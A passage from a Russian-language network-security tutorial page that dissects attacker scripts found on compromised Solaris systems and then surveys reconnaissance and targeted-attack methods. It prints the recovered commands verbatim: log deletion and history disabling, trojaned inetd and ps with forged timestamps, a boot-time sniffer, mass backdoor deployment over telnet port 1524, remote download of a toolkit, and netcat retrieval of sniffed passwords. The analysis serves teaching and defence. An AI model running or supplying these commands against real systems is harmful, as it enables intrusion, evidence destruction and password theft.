Компьютерные сети и технологии
Привет
Пользователь:

Пароль:



[ ]
[ ]

В сети
Гостей: 5
Участников: 0
На странице: 1
Участников: 3867, Новичок: ritasovurova

Разное

Безопасность сетей - методы хакерских атак
на Wednesday 12 February 2020
от список авторов
в Сетевая безопасность > Общие вопросы безопасности



Реальные сценарии атак

Сценарии, о которых рассказывалось выше, мы обнаружили во взломанных системах. Они показывают механизмы использования хакерами большого количества взломанных систем для сбора паролей.

Начнем исследование методов вторжения с системы-жертвы. Рассматриваемая система была взломана посредством переполнения буфера с помощью программы RPC Tooltalk для ОС Solaris. Был найден сценарий под названием bd, который загружался в систему.

unset HISTFILE; unset SAVEHIST

Хакер отключает файл журнала, чтобы его действия не фиксировались.
cp doc /usr/sbin/inetd;
chown root /usr/sbin/inetd;
chgrp root /usr/sbin/inetd;
touch 0716000097 /usr/sbin/inetd;

Хакер копирует файл doc поверх существующего inetd, изменяет владельца, группу и метку времени файла в соответствии с оригиналом.
rm -rf doc /tmp/bob /var/adm/messages /usr/lib/nfs/statd
/usr/openwin/bin/rpc.ttdb* /usr/dt/bin/rpc.ttdb*


Хакер удаляет файл doc, извлеченный из neet.tar, /tmp/bob (см. далее в разделе), сообщения (для удаления информации об атаке), файлы statd и rpc.ttdb (программу Tooltalk). Интересно, что хакер удалил также и метод, использовавшийся для получения доступа к системе.
rm -rf /var/log/messages /var/adm/sec* /var/adm/mail*
/var/log/mail* /var/adm/sec*


Хакер удаляет дополнительные файлы журналов для скрытия своих действий.
/usr/sbin/inetd -s;
/usr/sbin/inetd -s;
telnet localhost;
/usr/sbin/inetd -s;


Хакер запускает две копии inetd. Затем с помощью telnet он подключается к локальному хосту и запускает третью копию inetd.
ps -ef | grep inetd | grep bob | awk `{print "kill -9 " $2 }` > boo
chmod 700 boo
./boo


Хакер определяет место расположения первоначальной версии inetd, отыскивая inetd и bob в таблице процессов. Затем он создает файл boo, содержащий строку "kill -9 ", изменяет разрешения файла так, что он становится исполняемым, и запускает его. Затем удаляет исходный процесс inetd.
ps -ef | grep nfs | grep statd | awk `{print "kill -9 " $2 }` > boo
chmod 700 boo
./boo
ps -ef | grep ttdb | grep -v grep | awk `{print "kill -9 " $2 }` > boo
chmod 700 boo
./boo
rm -rf boo


Затем он определяет место расположения процессов statd и ttdb и удаляет их таким же образом.
mkdir /usr/man/tmp
mv update ps /usr/man/tmp
cd /usr/man/tmp
echo 1 "./update -s -o output" > /kernel/pssys
chmod 755 ps update
./update -s -o output &


Хакер создает директорию в /usr/man и помещает туда снифер и файл ps. Он создает сценарий, активизирующий снифер при перезагрузке системы, и запускает снифер.
cp ps /usr/ucb/ps
mv ps /usr/bin/ps
touch 0716000097 /usr/bin/ps /usr/ucb/ps


Хакер заменяет исходный файл ps новым и изменяет его метку времени в соответствии с оригиналом.
cd /
ps -ef | grep bob | grep -v grep
ps -ef | grep stat | grep -v grep
ps -ef | grep update

Далее хакер проверяет, что все работает как надо. Огромный интерес для нас представляет сценарий bd . Он показывает изменения в системе и дает подсказку о том, как хакер вошел в систему. Ключевой момент здесь - ссылка на /tmp/bob . При анализе причин удаления хакером исходного процесса inetd мы предположили, что этот процесс выполнялся вместе с файлом конфигурации /tmp/bob (inetd можно вызвать для работы с файлом конфигурации, введенным в командной строке). Неизвестно, что было в этом файле, но, вероятно, исходный эксплойт Tooltalk позволял перезагружать inetd с новым файлом конфигурации.

Другим интересным моментом сценария является уничтожение хакером процессов, с помощью которых он проник в систему. Наверное, он не хотел, чтобы другие атаковали его "владение". Главной ошибкой сценария был запуск трех процессов inetd. Произошло следующее: множественные процессы inetd стали видны, и в папке /var/log/messages появились сообщения о том, что второй и третий процессы inetd не могут связаться с telnet и FTP-портами.

Взломав системы изначально с помощью эксплойта, хакер затем использовал сценарии для загрузки каждой системы со снифером и "черным ходом". Он создал три сценария. Первый сценарий назывался massbd.sh.

#!/bin/sh
for i in `cat $1`; do (./bd.sh $i &);done


Этот сценарий использовал файл ввода (вероятно, список IP-адресов) и исполнял сценарий bd.sh (отличающийся от сценария bd , рассмотренного выше), направленный к каждому адресу.

В сценарии bd.sh содержатся всего две строки:
#!/bin/sh
./bdpipe.sh | telnet $1 1524


Данный сценарий дает хакеру ценную информацию о том, что делает в системе первоначально запущенный эксплойт переполнения буфера. Данный сценарий берет аргументы из командной строки и передает команды от третьего сценария bdpipe.sh через telnet. Обратите внимание на порт назначения - 1524.

Третий сценарий называется bdpipe.sh . Он содержит набор команд, передаваемых через telnet и исполняющихся на целевой системе.
#!/bin/sh
echo "cd /tmp;"
echo "rcp demos@xxx.yyy.zzz.aaa:neet.tar ./;"
sleep 2
echo "tar -xvf neet.tar;"
sleep 1
echo "./bd;"
sleep 10
echo "rm -rf neet.tar bd update*;"
sleep 10
echo "exit;"


Скрипт bdpipe.sh производит удаленное копирование файла neet.tar от другой системы, открывает файл и исполняет сценарий bd, найденный нами на компьютере-жертве. Этот сценарий удаляет neet.tar, bd и обновляет /tmp . Такой подход сработал не на всех системах, что позволило найти файл neet.tar и просмотреть его содержимое.

Можно предположить, что хакер планировал быстро взломать большое количество систем. Хотя сценарии несложные, много работы ушло на построение всех элементов атаки, чтобы добиться ширины ее размаха.

Из собранной информации видно, что хакер не стал загружать снифер на все системы-жертвы. Были найдены сценарии, предназначенные для извлечения собранных паролей. Первый сценарий назывался mget.sh .
for i in `cat $1` ; do (./sniff.sh $i &) ; done
Этот сценарий использовал список IP-адресов для вызова sniff.sh . Сценарий sniff.sh содержит всего две строки:

#!/bin/sh
./getsniff.sh | ./nc -p 53982 $1 23 >> $1.log


Сценарий sniff.sh использовал IP-адреса для установки соединения с целевой системой через порт 23 (telnet) от специального порта отправителя (53982). Программа nc (называемая также netcat ) позволяет устанавливать соединение от любого порта к любому порту. Находка этого сценария подсказала, что "черный ход" находился в измененном файле inetd. При установке соединения telnet от порта 53982 измененный inetd мог отыскивать пароли и, в случае успеха, запускать интерпретатор команд.

Третий сценарий назывался getshniff.sh . Он передавался через соединение nc и выполнялся на целевой системе.
#!/bin/sh
sleep 2
echo "oir##t"
sleep 1
echo "cd /usr"
sleep 1
echo "cd man"
echo "cd tmp"
sleep 2
echo "cat output*"
sleep 1
echo "exit"


Сценарий getshniff.sh . дал нам пароль, который использовался вместе с измененным inetd (oir##t) . Он вводил данные в nc для закрытия соединения с целевой системой и получал выходной файл из снифера.

Все эти сценарии наглядно показывают, чем занимался хакер в системе. После взлома системы он мог удаленно получать журналы снифера и, следовательно, проникать в системы, на которые не попал во время первой атаки. Автоматизация процесса взлома и извлечения паролей давала возможность быстрого доступа к большому количеству систем и расширения успеха с помощью получения и сохранения дополнительных паролей.

Выявление методов направленных хакерских атак

Хакер, использующий методы направленных атак, пытается проникнуть в конкретную организацию или нанести ей ущерб. Мотивацией его действий является стремление получить от организации информацию определенного типа. Он стремится причинить вред несколькими способами, используя для этого направленные DoS-атаки. Уровень мастерства таких хакеров выше, чем у тех злоумышленников, которые не имеют определенных целей.

Объекты атак

Выбор объекта атаки обычно обоснован - это информация, представляющая интерес для хакера. Хакера может нанять сторонняя организация для получения некоторых сведений. Независимо от причины, объектом атаки становится конкретная организация (не обязательно ее внутренняя система).

Предварительное исследование

В направленных хакерских атаках производится физическая разведка, а также предварительное исследование адресов, телефонных номеров, системы, сферы деятельности.

Предварительное исследование адресов

В процессе предварительного исследования адресов выявляется адресное пространство, используемое в организации. Эту информацию можно найти во многих местах. В первую очередь, служба DNS позволяет определить адреса веб-серверов организации: адрес главного DNS- сервера в домене и адрес почтового сервера. Отыскать нужные адреса можно с помощью Американского реестра номеров интернета (American Registry of Internet Numbers, ARIN). В ARIN возможен поиск по имени для нахождения адресных блоков, назначенных данной организации.

Дополнительные доменные имена, назначенные организации, имеются в Network Solutions. Для каждого найденного домена с помощью службы DNS определяются дополнительный веб-сервер, почтовый сервер и диапазон адресов. Поиск этой информации не привлекает внимания целевой системы.

Много информации об используемых адресах даст зонная передача от главного DNS-сервера домена. Если сервер позволяет осуществлять такую передачу, то в результате возможно получение списка всех известных ему систем домена. Это весьма ценная информация, но такой подход может обратить на себя внимание целевой системы. Правильно настроенные DNS-серверы ограничивают зонную передачу. В этом случае попытка получения информации заносится в журнал событий и выявляется администратором

Используя все вышеперечисленные способы, хакер получает список доменов, назначенных организации, адреса всех веб-серверов, почтовых серверов и главных серверов, список диапазонов адресов и, потенциально, список всех используемых адресов. Большую часть этой информации он найдет, не вступая в непосредственный контакт с организацией-жертвой.

Предварительное исследование беспроводных сетей

Хакер проверит близлежащий район (автомобильные стоянки, другие этажи здания, улицу) на предмет наличия беспроводных сетей. Эту разведку он выполнит без особых усилий, прогуливаясь вокруг здания или проезжая на автомобиле. В большинстве случаев его попытки подключения к беспроводной сети не будут зарегистрированы .

Предварительное исследование системы

Предварительное исследование систем представляет потенциальную опасность для хакера, но не с точки зрения задержания и ареста, а с точки зрения привлечения внимания. В процессе сбора данных хакер определяет используемое оборудование, операционные системы и их уязвимые места.

Хакер применяет развернутую отправку пинг-пакетов, скрытое сканирование или сканирование портов. Если он хочет остаться "в тени", то будет выполнять все очень медленно - один пинг-пакет по одному адресу примерно каждый час. Такая деятельность останется незамеченной для большинства администраторов.

Сканирование для определения операционных систем скрыть труднее, так как сигнатуры пакетов большинства инструментальных средств хорошо известны, и системы обнаружения вторжений (Intrusion Detection Systems, IDS) с большой степенью вероятности выявят эти попытки. Хакер может отказаться от использования известных инструментов и применит скрытое сканирование портов. Если система отвечает через порт 139 (NetBIOS RPC), то это, вероятно, Windows (NT, 2000, XP, 95 или 98), если через порт 111 (Sun RPC/portmapper) - то это система Unix. Почтовые системы и веб-серверы выявляются через подключение к определенным портам (25 - для почты, 80 - для веб) и исследование ответа. В большинстве случаев можно узнать тип используемого программного обеспечения и, следовательно, операционную систему. Такие подключения выглядят вполне легальными, не привлекая внимания администраторов или систем IDS.

Выявление уязвимых мест представляет для хакера серьезную опасность. Это можно сделать, осуществляя атаки или исследуя систему на наличие уязвимости. Одним из способов является проверка номера версии популярного программного обеспечения, например, почтового сервера или DNS-сервера, которая и подскажет известные уязвимые места

Если хакер воспользуется сканером уязвимых мест, то он с большой долей вероятности вызовет сигнал тревоги в системе обнаружения вторжений. Один сканер поможет хакеру отыскать единственную "прореху", другой выявит большее количество уязвимых мест. Независимо от используемого инструмента, хакер соберет нужную информацию, но, скорее всего, его присутствие будет замечено.

Предварительное исследование сферы деятельности

Понимание сферы деятельности организации очень важно для хакера. Он должен знать, как используются компьютерные системы, где размещена ценная информация и аппаратура. Эти знания помогут ему определить место расположения вероятной цели. Например, если сайт электронной коммерции вместо обработки транзакций владельцев кредитных карт отправляет покупателей на сайт банка, это означает, что на целевой системе не хранятся номера кредитных карт.

При проведении предварительного исследования хакер постарается выяснить, каким способом можно максимально навредить системе. Производителю, на единственной ЭВМ которого хранятся все производственные планы и материальные заказы, можно нанести серьезный ущерб выводом этой ЭВМ из строя. Именно эта ЭВМ станет главной целью для хакера, желающего максимально навредить этому производителю.

Частью бизнес-модели любой организации является размещение служащих и порядок осуществления ими своих функций. Организации, располагающиеся в одном помещении, способны обеспечить периметр безопасности вокруг всех важных систем. В организациях с множеством подразделений, связанных через интернет или выделенные каналы, может быть надежно защищена основная сеть, но слабо - удаленные офисы. Уязвимыми становятся организации, разрешающие служащим выполнять удаленное подключение. В этом случае домашние компьютеры сотрудников используют виртуальные частные сети для подключения к внутренней сети организации. Самым простым способом получения доступа в организацию в этом случае станет взлом одной из домашних систем.

И последним этапом разведки является сбор информации о служащих. Многие организации размещают информацию о руководителях на своем веб-сайте. Такая информация представляет большую ценность, если хакер задумает воспользоваться методами социального инжиниринга. Дополнительную информацию даст поиск в интернете по имени домена организации. Таким способом можно получить адреса электронной почты служащих, размещающих в интернете группы новостей, или список почтовых адресов. Зачастую в адресах электронной почты сотрудников содержатся идентификаторы пользователей.

Физические методы сбора данных

Физические методы сбора данных в основном используются в направленных хакерских атаках. Зачастую они позволяют получить доступ к нужной информации или компьютеру без реального взлома системы компьютерной безопасности организации.

Хакер ведет наблюдение за зданием, в котором размещается организация. Он изучает компоненты физической безопасности: устройства контроля доступа, камеры наблюдения и службу охраны. Он наблюдает за тем, как входят посетители, как выходят служащие во время перерыва. Такое наблюдение позволяет выявить слабые стороны системы физической безопасности, которые можно использовать для проникновения в здание.

Хакер проследит и за тем, как обращаются с мусором и выброшенными документами. Если все это складывается в мусорный бак позади здания, то он может ночью порыться в нем и найти интересующую информацию.

Методы атак

Имея на руках всю необходимую информацию об объекте атаки, хакер выберет наиболее подходящий способ с минимальным риском обнаружения. При этом он вряд ли выберет метод атаки, который включит систему тревоги.

Электронные методы атак

Хакер провел успешную разведку и выявил все внешние системы и все подключения к внутренним системам. Во время сбора данных об организации он определил уязвимые места систем. Выбор любого из них опасен, так как объект атаки может иметь системы обнаружения вторжения. Использование известных методов атак приведет в действие такую систему и вызовет ответные действия.

Хакер попытается скрыть атаку от IDS, разбивая ее на несколько пакетов. Но он никогда не будет уверен, что атака прошла незамеченной. Поэтому в случае успешного завершения атаки он сделает так, чтобы состояние системы выглядело как обычно. Хакер не станет удалять файлы журналов событий, поскольку это сразу привлечет внимание администратора. Вместо этого он уничтожит записи в журнале, выдающие его присутствие. Войдя в систему, хакер установит "черный ход" для последующих проникновений в систему.

Если хакер решит атаковать с помощью дозвона по телефону, он поищет удаленный доступ с легко угадываемым паролем или вовсе без пароля. Его первоочередными целями станут системы с удаленным управлением или системы администратора. Он атакует их в нерабочее время, чтобы предотвратить обнаружение атаки служащими.

Если хакер нашел уязвимую домашнюю систему служащего, он будет атаковать ее напрямую либо отправит туда вирус или "троянского коня". Подобная программа попадает на компьютер в виде вложения в сообщение электронной почты, которое самостоятельно исполняется и инсталлируется при открытии вложения. Такие программы особенно эффективны, если компьютер работает под управлением системы Windows.

При выявлении беспроводных сетей хакер получает способ легкого доступа. Нередко беспроводные сети являются частью внутренней сети организации и имеют меньше установленных и работающих устройств безопасности (типа систем IDS).

Использование взломанной системы

Хакер будет использовать взломанную систему в своих целях, стараясь скрыть следы своего присутствия настолько тщательно, насколько возможно. Такие хакеры не хвастаются своими победами. Взломанная система станет для него стартовой площадкой для проникновения в более засекреченные внутренние системы. Все действия будут выполняться максимально скрытно, чтобы не привлечь внимания администраторов.


Страница
1 : Часть 1
2 : Часть 2
3 > : Часть 3

Поиск Компьютерные сети и технологии

Copyright © 2006 - 2020
При использовании материалов сайта ссылка на xnets.ru обязательна!